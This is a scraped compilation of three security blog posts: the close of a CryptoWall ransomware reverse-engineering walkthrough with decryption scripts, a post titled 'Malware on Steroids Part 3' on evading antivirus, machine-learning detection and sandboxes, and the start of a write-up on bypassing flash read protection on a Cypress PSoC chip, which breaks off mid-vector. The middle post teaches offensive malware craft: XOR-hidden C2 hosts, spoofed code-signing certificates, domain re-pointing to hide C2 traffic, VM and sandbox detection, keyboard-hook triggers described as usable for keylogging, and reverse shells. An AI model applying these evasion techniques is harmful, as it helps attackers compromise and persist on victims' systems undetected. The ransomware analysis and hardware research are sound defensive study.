if ( ReadFileA(hFile, lpBuffer,
DuplicateKeyStruct->file_hash_size,
&lpNumberOfBytesRead, 0) && lpNumberOfBytesRead ==
DuplicateKeyStruct->file_hash_size )
{
if(memcmp(lpBuffer, DuplicateKeyStruct->file_hash,
DuplicateKeyStruct->file_hash_size))
{
isCompare = 1;
}
}

The pseudo-code is telling us that if an MD5 hash of the file is present in the header, then it’s already been encrypted. If this function returns isCompare as true, then CryptoWall moves on to another file and leaves this one alone. If the Compare16ByteHeader() function call returns false, the malware will append to the file’s extension, using a simple algorithm to generate a three-letter string to place at the end. The generation takes a timestamp, uses it as a seed, and for each of the three characters takes a seeded value modulo 26 and adds 97.

*(v8 + 2 * i) = DataSizeBasedOnSeed(0, 0x3E8u) % 26 + 97;

This works much like a rotation cipher: the modulo by 26 keeps the value within the 26 letters of the alphabet, and adding 97 shifts it into the lowercase ASCII range. As an example, if we have the letter ‘A’ (ordinal 65), then 65 % 26 + 97 = 110, so the ordinal moves up by 45 and it ends up becoming an ‘n’. In conclusion, if the victim file is named hello.py, this subroutine will rename it to hello.py.3xy.
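The arithmetic behind the suffix generation is easy to reproduce. In the sketch below, random.Random seeded with a timestamp is only a stand-in for the sample’s DataSizeBasedOnSeed(0, 0x3E8) call, whose exact generator and range handling I have not reproduced; the % 26 + 97 mapping is the part taken from the decompiled line.

```python
import random
import time


def to_lowercase_letter(value: int) -> str:
    """Map any non-negative integer onto 'a'..'z' using value % 26 + 97."""
    return chr(value % 26 + 97)


def random_suffix(seed: int, length: int = 3) -> str:
    """Generate a suffix of lowercase letters from a seeded generator.

    Assumption: random.Random stands in for the sample's own seeded PRNG.
    """
    rng = random.Random(seed)
    return "".join(to_lowercase_letter(rng.randrange(0, 0x3E8)) for _ in range(length))


suffix = random_suffix(int(time.time()))
print("hello.py." + suffix)
```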

Next, around address 0x004123F0, the generation of an AES-256 key begins with another call to Win32’s CryptAcquireContextW. The phProv handler gets passed over to be used in CryptGenKey and CryptGetKeyParam.

if (CryptGenKey(hProv, 0x6610, 1, &hKey))   // 0x6610 = CALG_AES_256, 1 = CRYPT_EXPORTABLE
{
    pbData_1 = 0;
    pdwDataLen_1 = 4;
    // 8 = KP_BLOCKLEN
    if (CryptGetKeyParam(hKey, 8, &pbData_1, &pdwDataLen_1, 0, 4))

The hexadecimal value 0x6610 shown above tells us that the generated key is going to be AES-256 (CALG_AES_256 in Microsoft’s documentation). Once hKey, the address to which the function copies the handle of the newly generated key, is populated, CryptGetKeyParam is used to retrieve a parameter of that key into pbData, a pointer to a buffer that receives the data. The last call in this function, which we labeled GenerateAESKey(), is CryptExportKey. It takes the handle of the key to be exported and returns a key BLOB. The second parameter of GenerateAESKey() will hold the aes_key.


The next call is one of the most important for understanding how we can eventually decrypt the files that CryptoWall infected. EncryptAESKey() uses the pointer to DuplicateKeyStruct->rsa_key to encrypt our AES key into a 256 byte blob. The inside of this function is fairly simple: it uses CryptDuplicateKey to duplicate both the public RSA 2048-bit key from earlier and our newly generated AES key to save for later, then calls CryptEncrypt to encrypt the buffer. The fifth parameter is our data out in this case, and once the function returns, what we labeled as encrypted_AESkey_buffer will hold our RSA encrypted key.

At around address 0x004124A5, you will see two calls to WriteFileA. The first call writes the 16 byte MD5 hash at the top of the victim file, and the second call writes out the 256 bytes of encrypted key buffer right below the hash.

Note: the screenshot shows a 128 byte encrypted key buffer because of a copy mistake; it is supposed to be 256 bytes of encrypted key text.

The picture above shows what an example file will look like up until this stage of the infection. The plaintext is still intact, but the headers now hold the hash of the file and the encrypted AES key used to encrypt the plaintext in the next phase. ReadFileA will shortly get called at 0x0041261B, which will read out everything after the header of the file to start the encryption process.


Now that 272 bytes belong to the header, we can assume anything after that is fair game for the next function to deal with. We don’t really need to dive too deep into what DuplicateAESKey_And_Encrypt() does, as it is pretty self-explanatory. The file contents are encrypted using the already generated AES key from above that was passed into the HCRYPTKEY *hKey variable. The sixth parameter of this function is the pointer which will contain the encrypted buffer. At this point the ransomware replaces the plaintext with an encrypted blob, and the AES key is freed from memory.
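For analysis purposes, the layout described above (16 bytes of hash, 256 bytes of RSA-encrypted AES key, then the encrypted contents) can be sketched as a small Python helper. The function and constant names are hypothetical; only the sizes come from the walkthrough.

```python
HASH_SIZE = 16       # MD5 digest written at the top of the file
ENC_KEY_SIZE = 256   # AES key encrypted with the 2048-bit RSA public key
HEADER_SIZE = HASH_SIZE + ENC_KEY_SIZE  # 272 bytes in total


def split_encrypted_file(file_data: bytes):
    """Return (md5_header, encrypted_aes_key, ciphertext) from raw file bytes."""
    if len(file_data) < HEADER_SIZE:
        raise ValueError("file is too short to contain the 272-byte header")
    md5_header = file_data[:HASH_SIZE]
    encrypted_aes_key = file_data[HASH_SIZE:HEADER_SIZE]
    ciphertext = file_data[HEADER_SIZE:]
    return md5_header, encrypted_aes_key, ciphertext
```

Splitting the file this way keeps the two decryption steps separate: the middle slice goes to the RSA step, and the last slice goes to the AES step.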

Example of a fully encrypted file

After the file is finished being processed, the loop will continue until every allow listed file type on disk is encrypted.

Decrypting Victim Files

Unfortunately in this case, it is only possible to write a decryption algorithm if you know the private key used which is generated on the C2 side. This is going to be a two step process as in order to decrypt the file contents, we need to decrypt the AES key that has been RSA encrypted.

The fake C2 server I wrote also includes an area where a private key is generated at the same time that the public key is generated. So in my case, all encrypted files on my VM are able to be decrypted.

Side Note: In order to run this C2 server, you have to place the malware’s hardcoded I2P addresses in the hosts file on Windows (C:\Windows\System32\drivers\etc\hosts). Then make sure the server has started before executing the malware, as there will be a lot of initial verification going back and forth between the malware and the ‘C2’ to ensure its legitimacy. Your file should look like this:

127.0.0.1 proxy1-1-1.i2p
127.0.0.1 proxy2-2-2.i2p

Another reason why we run the fake C2 server before executing the malware is so we don’t end up in some deadlock state. The output from our server will look something like this:

C:\CryptoWall\> python.exe fake_c2_i2p_server.py

* Serving Flask app "fake_c2_server" (lazy loading)
127.0.0.1 - - [31/Mar/2020 15:10:06] "GET / HTTP/1.1" 404 -

Data Received from CryptoWall Binary:
------------------------------
[!] Found URI Header: 93n14chwb3qpm
[+] Created key from URI: 13349bchmnpqw
[!] Found ciphertext: ff977e974ca21f20a160ebb12bd99bd616d3690c3f4358e2b8168f54929728a189c8797bfa12cfa031ee9c2fe02e31f0762178b3b640837e34d18407ecbc33
[+] Recovered plaintext: b'{1|crypt1|C6B359277232C8E248AFD89C98E96D65|0|2|1||55.59.84.254}'

[+] Sending encrypted data blob back to cryptowall process
127.0.0.1 - - [31/Mar/2020 15:11:52] "POST /93n14chwb3qpm HTTP/1.1" 200

Step by step, the first thing we have to do is write a program that imports the private key file. I used C++ for this portion because for the life of me I could not figure out how to mimic the CryptDecodeObjectEx API call that decodes the key in X509_ASN_ENCODING and PKCS_7_ASN_ENCODING format. Once we have the key blob from this function, we can do as the malware does and call CryptImportKey, but this time with a private key and not a public key ;). Since the first 16 bytes of the victim file contain the MD5 hash of the unencrypted file, we know we can skip that part and focus on the 256 bytes that follow it in the header. The encrypted key block is 256 bytes long and ends at offset 272, which is where the AES-encrypted data begins. Once we have the blob, we can call CryptDecrypt and print out the decrypted key blob, whose last 32 bytes are the AES key:

if (!CryptDecrypt(hKey, NULL, FALSE, 0, keyBuffer, &bytesRead))
{
    printf("[-] CryptDecrypt failed with error 0x%.8X\n",
           GetLastError());
    return FALSE;
}

printf("[+] Decrypted AES Key => ");
for (int i = 0; i < bytesRead; i++)
{
    printf("%02x", keyBuffer[i]);
}

You can find the whole script here. Now that we are halfway there and have an AES key, the last thing to do is write a simple Python script that takes that key and the encrypted file and decrypts everything after the first 272 bytes.

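from Crypto.Cipher import AES  # provided by PyCryptodome

# Everything after the 272-byte header is AES-encrypted file content
enc_data_remainder = file_data[272:]
cipher = AES.new(aes_key, AES.MODE_ECB)
plaintext = cipher.decrypt(enc_data_remainder)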

The script to perform this action is in the same folder on GitHub. If you want to see how the whole thing looks from start to finish, it will go like this:

➜  decrypt_aes_key.exe priv_key_1.pem loveme.txt
[+] Initialized crypto provider
[+] Successfully imported private key from PEM file
[!] Extracted encrypted AES keys from file
[+] Decrypted AES Key => 08020000106600002000000040b4247954af27637ce4f7fabfe1ccfc6cd55fc724caa840f82848ea4800b320
[+] Successfully decrypted key from file

➜ python decrypt_file.py loveme.txt 40b4247954af27637ce4f7fabfe1ccfc6cd55fc724caa840f82848ea4800b320
[+] Decrypting file
[+] Found hash header => e91049c35401f2b4a1a131bd992df7a6
[+] Plaintext from file: b'"hello world" \r\n'
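Note that the blob printed by the first tool is longer than the key passed to the second one: the first 12 bytes look like a CryptoAPI plaintext key blob header (blob type 0x08, version 2, algorithm 0x6610, key size 0x20), followed by the 32 key bytes. A minimal Python sketch of stripping that header, assuming that layout and using a hypothetical function name:

```python
import struct

PLAINTEXTKEYBLOB = 0x08
CALG_AES_256 = 0x6610


def extract_aes_key(blob: bytes) -> bytes:
    """Strip the 12-byte header from a decrypted key blob and return the raw key."""
    # Assumed layout: bType (1), bVersion (1), reserved (2), aiKeyAlg (4), key size (4)
    b_type, _version, _reserved, alg_id, key_size = struct.unpack_from("<BBHII", blob, 0)
    if b_type != PLAINTEXTKEYBLOB:
        raise ValueError("not a plaintext key blob")
    if alg_id != CALG_AES_256:
        raise ValueError("unexpected algorithm identifier")
    key = blob[12:12 + key_size]
    if len(key) != key_size:
        raise ValueError("blob is shorter than its declared key size")
    return key


blob = bytes.fromhex(
    "080200001066000020000000"
    "40b4247954af27637ce4f7fabfe1ccfc6cd55fc724caa840f82848ea4800b320"
)
print(extract_aes_key(blob).hex())
```

Run against the blob from the transcript above, this yields the same 32-byte key that is passed to decrypt_file.py.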

Conclusion

Overall this was one of the biggest leading cyber threats back in 2013, and the threat actors behind this malicious virus have shown their years of experience when it comes to engineering a ransomware such as this.

Although this ransomware is over 6 years old, reverse engineering it still fascinated me so much that I wanted to share all the tooling I have written for it. Every step of the way there was another challenge to overcome, whether it was knowing what the malware expected the encrypted payload to look like coming back from the C2, figuring out how to decrypt their C2 I2P servers using RC4, decompressing the ransomware note using some hard to mimic LZNT1 algorithm, or even understanding their obscure way of generating domain URI paths… it was all around a gigantic puzzle for a completionist engineer like myself.

Here is the repository that contains all the programs I wrote that helped me research CryptoWall.

Thank you for following along! I hope you enjoyed it as much as I did. If you have any questions on this article or where to find the challenge, please DM me at my Instagram: @hackersclub or Twitter: @ringoware

Happy Hunting 🙂

Malware on Steroids Part 3: Machine Learning & Sandbox Evasion

 

( Original text by Paranoid Ninja )

It’s been a busy month for me and I was not able to find time to write the final part of the series on Malware Development. But I have been receiving too many DMs on Twitter lately asking me to publish the final part. So here we are.

If you are reading this blog, I am basically assuming that you know C/C++ and Windows API by now. If you don’t, then you should go back and read my other blogs on Static AV Evasion and Malware Development using WINAPI (basics).

In this post, we will be using multiple ways to evade endpoint detection mechanisms and sandboxes. Machine Learning is applied at two major levels in most organizations. One is at the network level, where it tries to identify anomalies based on the behavior of network connections, proxy logs and pattern of connections over time. Most Network ML Solutions tend to analyze malware beacons and use DPI (deep packet inspection) to identify the malware. This is something that Microsoft ATA (Advanced Threat Analytics) or FireEye sandboxes do. On the other hand, we have Endpoint agents like Symantec EP, Crowdstrike, Endgame, Microsoft Cloud Defender and similar monitoring tools which perform behavioral analysis of the code along with signature detection to detect malicious processes.

I will purely be focusing on multiple ways where we can make our malware behave like a legitimate executable or try to confuse the Endpoint agent to evade detection. I’ve used the methods mentioned in this blog to successfully evade Crowdstrike Agent, Symantec EP and Microsoft Windows Cloud Defender, the videos of the latter which I have already posted in my previous blogs. However, you might need to modify or add new techniques as this might become detectable over time. One of the best ways to avoid AV is to disable the Process creation altogether and just use WINAPI. But that would mean carefully crafting your payloads and it would be difficult to port them for shellcoding. That’s the main reason malware authors write their malwares in C, and only selected payloads in shellcode. A combination of these two makes malwares unbeatable on all fronts.

Each of the techniques mentioned below creates a unique signature which most AVs won’t have. It’s more a matter of trial and error to check which AVs detect which techniques. Also remember that we can use stubs and packers for encryption, but that’s for a different blog post that I will do later.

P.S.: This blog is exclusive of shellcodes, reason being I will be writing a separate blog series on windows Shellcoding later. I will be using encrypted functions during the shellcoding part and not in this post. This post is specifically how Malware authors use C to perform evasions. You can also use the same APIs and code snippets mentioned below to craft a custom malware for Red Teaming.

main():

So, before we start let’s try to get a basic understanding of how Machine learning works. Machine learning is purely focused on the behaviour of the user (in case of endpoints). In short, if we sign our malware and try to make it act like a legitimate executable, it becomes really easy to evade ML. I’ve seen people using PowerShell to write reverse shells, but they get easily detected due to Microsoft’s AMSI (Anti-Malware Scan Interface), which constantly keeps on checking (including and mainly PowerShell) to detect malicious process executions and connections.  For those of you who don’t know, Microsoft uses the DMTK (Microsoft Distributed Machine Learning Toolkit) framework, which is basically a decision tree based algorithm which specifies whether a file is malicious or not. PowerShell is very tightly controlled by Microsoft and it gets harder over time to evade ML when using PowerShell.

This is the reason I decided to switch to C and C++ to get reverse shells over network so that I could have flexibility at a lower level to do whatever I want. We will be using a lot of windows APIs, encrypted variables and a lot of decision trees of our own to evade ML. This is supposed to work until Microsoft starts using the CNTK framework, which is a much better framework than DMTK, but harder to apply at the same time.

Encrypted Host & Process Names

So, the first thing to do is to encrypt our hostname. We can possibly use something as simple as XOR, or any custom complicated mathematical equation to decrypt our encrypted variable to get the hostname. I created a python script which takes a hostname and a character and returns a Xor’d Array:

As you can see, it gives the Key value in integer of the Xor Key, the length of the encrypted array and the whole Encrypted array which we can simply use in a C integer or char array.

The next step is to decrypt this array at runtime and we need to hardcode the key inside the executable. This is the only key that we would be hardcoding into the code. Also, to make it complicated for the reverse engineer, we will write a C function to automatically detect that the last integer is the key and use that to loop through the array to decrypt the encrypted string. Below is how it would look like

So, we are creating a char buffer of the size of EncryptedHost on heap. We are then passing the host, length and decrypted host variable to the Decrypter function. Below is how the Decrypter function looks:

To explain in short, it creates an Encrypted Integer array of our char array  and xors them back again using the key to convert the encrypted value to the original value and stores them in the DecryptedData array we created previously. With the help of this, if someone runs strings, they wouldn’t be able to see any host in the executable. They would need to understand the math and set a proper breakpoint in Debugger to fetch the C2 host. You can create more complicated mathematical equations to decrypt host if required. We can now use this DecryptedData array within our sockets to connect to the remote host.

P.S.: Reverse Engineers & Sandboxes can fetch the C2 names with the help of packet captures and DNS Name Resolutions. It is better to send raw packets to multiple hosts to confuse which one is the real C2 server. But at the same time, this can lead to easy  detection of the malware. Check my Legitimate Domain Routing technique below which is much better than using this.

If you’ve read my previous post, then you know that I created a cmd.exe process using the CreateProcessW winAPI. We can do what we did above for Creating Processes as well. But instead of hardcoding the Encrypted array for the Process to be executed, we will send the process name as an array over network once the executable connects to the C2 Server along with the host. We can also use authentication on C2 server, and only allow it to connect if it sends a proper key. Below is the Code for Creating Processes using Encrypted Char array over sockets

In this way, when a system sandboxes our executable, it won’t know that what process are we executing beforehand inside a sandbox. Below is a much clearer description of what we are doing:

  1. Decrypt C2 host at runtime and connect to host
  2. Receive password and verify if it is right
  3. If the key is right, wait for 5 seconds to receive encrypted array(process name) over socket
  4. Decrypt the received Process and run it using CreateProcessW API

With the help of the above technique, if our C2 is down, then the sandbox/analyst will not be able to find what we are executing since we have not hardcoded any processes to execute.

Code Signing with Spoofed Certs

I wrote a Script in python which can fetch and create duplicate certificates from any website which we can use for code signing. One thing I noticed is that Antiviruses don’t check and verify the whole chain of the certificate. They don’t even verify the authenticity. The main reason being not every antivirus can connect to the internet in every organization to fetch and verify the certificates for every third party application installed. You can find the Certificate spoofing python script on my GitHub profile here.

And this is the scan results of Windows ML Defender after Signing:

Next thing is we will try to add a few features to our malware to detect if we are running in a sandbox or inside a virtual machine. We will try to evade Sandboxes as much as possible and kill our executable as soon as we find anything suspicious. We need to make sure that our malware doesn’t even look suspicious. Because if it does, then the sandbox will quarantine it and send an alert that there is a suspicious process running. This is worse than detection because this is where most SOC detects the malware and the Red Teaming gets detected.

Legitimate Domain Routing (Evade Proxy Categorization Detection and Endpoint Detection)

This is one of the best techniques I’ve found out till date which almost works every time. Let’s say I buy a C2 domain named abc.com. I will modify the A records so that it points to Microsoft.com or some similar legitimate site for a month or so. When the malware executes on the victim’s system, it will connect to this domain which will send a normal HTTP reply from Microsoft and the malware will go to sleep for a few hours and then loop into doing the same thing. Now whenever I want to get a reverse shell of my malware, I will simply change the A records of abc.com to my C2 hosting server and it will send a key in HTTP to the malware which will trigger it to fetch shellcode or send a shell back to my C2. This way, our abc.com will also get categorized as a legitimate domain instead of malicious or phishing site. And even the Endpoint systems will not block it since it is contacting a legitimate domain. Over time I’ve also used Symantec’s website to connect as a temporary domain, later changing it to my malicious C2 server.

Check System Uptime & Idletime (Evades Virtual Machine Sandboxes)

If our executable is running in a virtual machine, the uptime will be pretty short since it will boot up, perform analysis on our binary and then shutdown. So, we can check the uptime of the machine and sleep till it reaches 20-30 minutes and then run it. Make sure to use NTP to check the time with external domain, else Sandboxes can fast-forward system time for process executions. Checking via NTP will make sure that correct time is checked. Below is the code to check uptime of a system and also idle time in case required.

Idletime:

Uptime:

Check Mac Address of Virtual Machine (Known OUIs)

Vmware, Virtual box, MS Hyper-v and a lot of virtual machine providers use a fixed MAC Unique identifier which can be used to run in a loop to check if current mac address matches to any of those mentioned in the list. If it is, then it is highly possible that the malware is running in a virtual environment, mostly for the purpose of sandboxing and reverse engineering. Below are the OUIs that I know for the moment. If there are more, do let me know in the comments.

Company and Products MAC unique identifier (s)
VMware ESX 3, Server, Workstation, Player 00-50-56, 00-0C-29, 00-05-69
Microsoft Hyper-V, Virtual Server, Virtual PC 00-03-FF
Parallels Desktop, Workstation, Server, Virtuozzo 00-1C-42
Virtual Iron 4 00-0F-4B
Red Hat Xen 00-16-3E
Oracle VM 00-16-3E
XenSource 00-16-3E
Novell Xen 00-16-3E
Sun xVM VirtualBox 08-00-27

Below is the C code to detect mac address of a Windows machine:

Execute shellcode when a specific key is pressed. (Sleep & hook method)

Here, we are only executing our shellcode/malicious process when the user presses a specific key. For this, we can hook the keyboard and create a list of multiple keys that specify what kind of shellcode needs to be executed. This is basically polymorphism. Every time a different shellcode depending on the key will confuse the Antivirus, and secondly in a sandbox, no one presses any key. So, our malware won’t execute in a sandbox. Below is the Code to hook the keyboard and check the key pressed.

P.S.: Below code can also be used for Keylogging

Check number of files in Temp and Recent Files

Whenever a malware is running in a sandbox, the sandbox will have the minimum number of recent files in the virtual machine reason being sandboxes are not used for usual work. So, we can run a loop to check the number of recent files and also files in temp directory to check if we are running in a virtual machine. If the number of recent files are less than 10-15, just sleep or suspend itself. Below is a code I wrote which loops to check all files and folders in a directory:

Now I can keep on going like this, but the blog will just get lengthier with this. Besides, below are a few things you can code to check if we are running in a sandbox:

  1. Check if the hard disk size is greater than 60 GB (Default Virtual Machine Sandbox Size is <100GB)
  2. Check if Packet Capture Driver is installed in the registry (To check if Wireshark or similar is running for packet analysis)
  3. Check if Virtual Box additions/extension pack is installed
  4. WannaCry DNS Sinkhole Method

This is another method which WannaCry used. So basically, the malware will try to connect to a domain that doesn’t exist. If it does, it means the malware is running in a sandbox, since Sandboxes will reply to a NX Domain too to check if that’s a C2 Server. If we get a NX domain in reply, then we can directly connect to the C2 host. BEWARE, that DNS Sinkholes can prevent your malware from executing at all. Instead you can buy a certain domain and check for a customized response to check if you are running in a sandbox environment.

Now, there are much more different ways to evade ML and AV detection and they aren’t really that hard. Evading ML based AVs are not rocket science as people say. It’s just that it requires more of free time to sit and understand how the underlying architecture works and find flaws to evade it.

It’s much better to invest in a highly technical Threat Hunter for detecting suspicious behaviors in your environments and logs rather than buying a high-end Sandbox or Antivirus Solution, though the latter is also useful in its own way.

 

Aigo Chinese encrypted HDD − Part 2: Dumping the Cypress PSoC 1

Original post by Raphaël Rigo on syscall.eu ( under CC-BY-SA 4.0 )

TL;DR

I dumped a Cypress PSoC 1 (CY8C21434) flash memory, bypassing the protection, by doing a cold-boot stepping attack, after reversing the undocumented details of the in-system serial programming protocol (ISSP).

It allows me to dump the PIN of the hard-drive from part 1 directly:

$ ./psoc.py 
syncing:  KO  OK
[...]
PIN:  1 2 3 4 5 6 7 8 9  

Code:

Introduction

So, as we have seen in part 1, the Cypress PSoC 1 CY8C21434 microcontroller seems like a good target, as it may contain the PIN itself. And anyway, I could not find any public attack code, so I wanted to take a look at it.

Our goal is to read its internal flash memory and so, the steps we have to cover here are to:

  • manage to “talk” to the microcontroller
  • find a way to check if it is protected against external reads (most probably)
  • find a way to bypass the protection

There are 2 places where we can look for the valid PIN:

  • the internal flash memory
  • the SRAM, where it may be stored to compare it to the PIN entered by the user

ISSP Protocol

ISSP ??

“Talking” to a micro-controller can imply different things from vendor to vendor but most of them implement a way to interact using a serial protocol (ICSP for Microchip’s PIC for example).

Cypress’ own proprietary protocol is called ISSP for “in-system serial programming protocol”, and is (partially) described in its documentation. US Patent US7185162 also gives some information.

There is also an open source implementation called HSSP, which we will use later.

ISSP basically works like this:

  • reset the µC
  • output a magic number to the serial data pin of the µC to enter external programming mode
  • send commands, which are actually long strings of bits called “vectors”

The ISSP documentation only defines a handful of such vectors:

  • Initialize-1
  • Initialize-2
  • Initialize-3 (3V and 5V variants)
  • ID-SETUP
  • READ-ID-WORD
  • SET-BLOCK-NUM: 10011111010dddddddd111 where dddddddd=block #
  • BULK ERASE
  • PROGRAM-BLOCK
  • VERIFY-SETUP
  • READ-BYTE: 10110aaaaaaZDDDDDDDDZ1 where DDDDDDDD = data out, aaaaaa = address (6 bits)
  • WRITE-BYTE: 10010aaaaaadddddddd111 where dddddddd = data in, aaaaaa = address (6 bits)
  • SECURE
  • CHECKSUM-SETUP
  • READ-CHECKSUM: 10111111001ZDDDDDDDDZ110111111000ZDDDDDDDDZ1 where DDDDDDDDDDDDDDDD = Device Checksum data out
  • ERASE BLOCK

For example, the vector for Initialize-2 is:

1101111011100000000111 1101111011000000000111
1001111100000111010111 1001111100100000011111
1101111010100000000111 1101111010000000011111
1001111101110000000111 1101111100100110000111
1101111101001000000111 1001111101000000001111
1101111000000000110111 1101111100000000000111
1101111111100010010111

Each vector is 22 bits long and seems to follow some pattern. Thankfully, the HSSP doc gives us a big hint: “ISSP vector is nothing but a sequence of bits representing a set of instructions.”

Demystifying the vectors

Now, of course, we want to understand what’s going on here. At first, I thought the vectors could be raw M8C instructions, but the opcodes did not match.

Then I just googled the first vector and found this research by Ahmed Ismail which, while it does not go into much details, gives a few hints to get started: “Each instruction starts with 3 bits that select 1 out of 4 mnemonics (read RAM location, write RAM location, read register, or write register.) This is followed by the 8-bit address, then the 8-bit data read or written, and finally 3 stop bits.”

Then, reading the Technical Reference Manual’s section on the Supervisory ROM (SROM) is very useful. The SROM is hardcoded (ROM) in the PSoC and provides functions (like syscalls) for code running in “userland”:

  • 00h : SWBootReset
  • 01h : ReadBlock
  • 02h : WriteBlock
  • 03h : EraseBlock
  • 06h : TableRead
  • 07h : CheckSum
  • 08h : Calibrate0
  • 09h : Calibrate1

By comparing the vector names with the SROM functions, we can match the various operations supported by the protocol with the expected SROM parameters.

This gives us a decoding of the first 3 bits :

  • 100 => “wrmem”
  • 101 => “rdmem”
  • 110 => “wrreg”
  • 111 => “rdreg”
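Putting the quoted layout together with this mnemonic table, a write vector can be split mechanically into 3 mnemonic bits, 8 address bits, 8 data bits and 3 trailing bits. The Python sketch below is only an illustration with a hypothetical function name; it covers the write forms only, since the documented read vectors interleave high-Z turnaround bits.

```python
MNEMONICS = {"100": "wrmem", "101": "rdmem", "110": "wrreg", "111": "rdreg"}


def decode_write_vector(bits: str):
    """Split a 22-bit write vector into (mnemonic, address, data, trailer)."""
    if len(bits) != 22 or set(bits) - {"0", "1"}:
        raise ValueError("expected a string of exactly 22 '0'/'1' characters")
    mnemonic = MNEMONICS[bits[:3]]   # first 3 bits select the operation
    address = int(bits[3:11], 2)     # next 8 bits: register or RAM address
    data = int(bits[11:19], 2)       # next 8 bits: value to write
    trailer = bits[19:]              # last 3 bits, "111" in the listed vectors
    return mnemonic, address, data, trailer


# First and third vectors of Initialize-2, as listed earlier.
for vector in ("1101111011100000000111", "1001111100000111010111"):
    op, addr, value, _ = decode_write_vector(vector)
    print(f"{op} 0x{addr:02X}, 0x{value:02X}")
```

Applied to the first vectors of Initialize-2, this gives a register write of 0x00 to 0xF7 and a memory write of 0x3A to 0xF8.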

But to fully understand what is going on, it is better to be able to interact with the µC.

Talking to the PSoC

As Dirk Petrautzki already ported Cypress’ HSSP code on Arduino, I used an Arduino Uno to connect to the ISSP header of the keyboard PCB.

Note that over the course of my research, I modified Dirk’s code quite a lot, you can find my fork on GitHub: here, and the corresponding Python script to interact with the Arduino in my cypress_psoc_tools repository.

So, using the Arduino, I first used only the “official” vectors to interact, trying to read the internal ROM using the VERIFY command. This failed, as expected, most probably because of the flash protection bits.

I then built my own simple vectors to read/write memory/registers.

Note that we can read the whole SRAM, even though the flash is protected !

Identifying internal registers

After looking at the vector’s “disassembly”, I realized that some undocumented registers (0xF8-0xFA) were used to specify M8C opcodes to execute directly !

This allowed me to run various opcodes such as ADD, MOV A,X, PUSH or JMP, which, by looking at the side effects on all the registers, allowed me to identify which undocumented registers actually are the “usual” ones (A, X, SP and PC).

In the end, the vector’s “disassembly” generated by HSSP_disas.rb looks like this, with comments added for clarity:

--== init2 ==--
[DE E0 1C] wrreg CPU_F (f7), 0x00      # reset flags
[DE C0 1C] wrreg SP (f6), 0x00         # reset SP
[9F 07 5C] wrmem KEY1, 0x3A            # Mandatory arg for SSC
[9F 20 7C] wrmem KEY2, 0x03            # same
[DE A0 1C] wrreg PCh (f5), 0x00        # reset PC (MSB) ...
[DE 80 7C] wrreg PCl (f4), 0x03        # (LSB) ... to 3 ??
[9F 70 1C] wrmem POINTER, 0x80         # RAM pointer for output data
[DF 26 1C] wrreg opc1 (f9), 0x30       # Opcode 1 => "HALT"
[DF 48 1C] wrreg opc2 (fa), 0x40       # Opcode 2 => "NOP"
[9F 40 3C] wrmem BLOCKID, 0x01         # BLOCK ID for SSC call
[DE 00 DC] wrreg A (f0), 0x06          # "Syscall" number : TableRead
[DF 00 1C] wrreg opc0 (f8), 0x00       # Opcode for SSC, "Supervisory SROM Call"
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12   # Undocumented op: execute external opcodes
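The bracketed bytes in this listing appear to be the 22 vector bits left-aligned and padded with two zero bits to fill three bytes. That is an inference from the listing rather than something the ISSP documentation states, and the function names below are hypothetical, but a short Python sketch reproduces the values shown:

```python
OPCODE_BITS = {"wrmem": "100", "wrreg": "110"}


def encode_write_vector(op: str, address: int, data: int) -> str:
    """Build the 22-bit string for a wrmem/wrreg vector."""
    if not (0 <= address <= 0xFF and 0 <= data <= 0xFF):
        raise ValueError("address and data must each fit in 8 bits")
    return OPCODE_BITS[op] + format(address, "08b") + format(data, "08b") + "111"


def to_hex_bytes(bits: str) -> str:
    """Left-align 22 bits in 24 bits (assumed padding) and format as three hex bytes."""
    padded = bits.ljust(24, "0")
    return " ".join(format(int(padded[i:i + 8], 2), "02X") for i in range(0, 24, 8))


# wrreg CPU_F (f7), 0x00 and wrmem KEY1 (f8), 0x3A from the init2 listing
print(to_hex_bytes(encode_write_vector("wrreg", 0xF7, 0x00)))
print(to_hex_bytes(encode_write_vector("wrmem", 0xF8, 0x3A)))
```

The same helper can be used to build custom vectors for reading back registers, provided the matching read opcodes and turnaround bits are handled separately.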

Security bits

At this point, I am able to interact with the PSoC, but I need reliable information about the protection bits of the flash. I was really surprised that Cypress did not give users any means to check the protection’s status. So, I dug a bit more on Google to finally realize that the HSSP code provided by Cypress was updated after Dirk’s fork.

And lo ! The following new vector appears:

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[9F A0 1C] wrmem 0xFD, 0x00           # Unknown args
[9F E0 1C] wrmem 0xFF, 0x00           # same
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 02 1C] wrreg A (f0), 0x10         # Undocumented syscall !
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

By using this vector (see read_security_data in psoc.py), we get all the protection bits in SRAM at 0x80, with 2 bits per block.

The result is depressing: everything is protected in “Disable external read and write” mode ; so we cannot even write to the flash to insert a ROM dumper. The only way to reset the protection is to erase the whole chip 🙁

First (failed) attack: ROMX

However, we can try a trick: since we can execute arbitrary opcodes, why not execute ROMX, which is used to read the flash ?

The reasoning here is that the SROM ReadBlock function used by the programming vectors will verify if it is called from ISSP. However, the ROMX opcode probably has no such check.

So, in Python (after adding a few helpers in the Arduino C code):

for i in range(0, 8192):
    write_reg(0xF0, i>>8)        # A = high byte of the address
    write_reg(0xF3, i&0xFF)      # X = low byte of the address
    exec_opcodes("\x28\x30\x40") # ROMX, HALT, NOP
    byte = read_reg(0xF0)        # ROMX reads ROM[A|X] into A
    print "%02x" % ord(byte[0])  # print ROM byte

Unfortunately, it does not work 🙁 Or rather, it works, but we get our own opcodes (0x28 0x30 0x40) back ! I do not think it was intended as a protection, but rather as an engineering trick: when executing external opcodes, the ROM bus is rewired to a temporary buffer.

Second attack: cold boot stepping

Since ROMX did not work, I thought about using a variation of the trick described in section 3.1 of Johannes Obermaier and Stefan Tatschner’s paper: Shedding too much Light on a Microcontroller’s Firmware Protection.

Implementation

The ISSP manual gives us the following CHECKSUM-SETUP vector:

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
